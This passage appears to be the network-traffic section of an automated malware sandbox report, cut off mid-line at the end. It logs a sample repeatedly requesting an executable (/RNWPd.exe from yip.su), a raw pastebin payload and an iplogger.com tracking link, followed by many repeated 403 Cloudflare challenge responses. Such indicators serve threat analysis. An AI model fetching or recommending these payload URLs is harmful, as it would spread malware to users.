                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /1djqU4 HTTP/1.1Host: iplogger.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: pastebin.com
                Source: global trafficDNS traffic detected: DNS query: yip.su
                Source: global trafficDNS traffic detected: DNS query: iplogger.com
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 17 Aug 2024 22:08:05 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 17 Aug 2024 22:08:11 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 17 Aug 2024 22:08:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 17 Aug 2024 22:08:23 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 17 Aug 2024 22:08:29 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 17 Aug 2024 22:08:34 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 17 Aug 2024 22:08:40 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 17 Aug 2024 22:08:47 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 17 Aug 2024 22:08:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 17 Aug 2024 22:08:57 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 17 Aug 2024 22:09:03 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 17 Aug 2024 22:09:09 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 17 Aug 2024 22:09:15 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 17 Aug 2024 22:09:20 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 17 Aug 2024 22:09:26 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 17 Aug 2024 22:09:32 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 17 Aug 2024 22:09:38 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 17 Aug 2024 22:09:43 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: 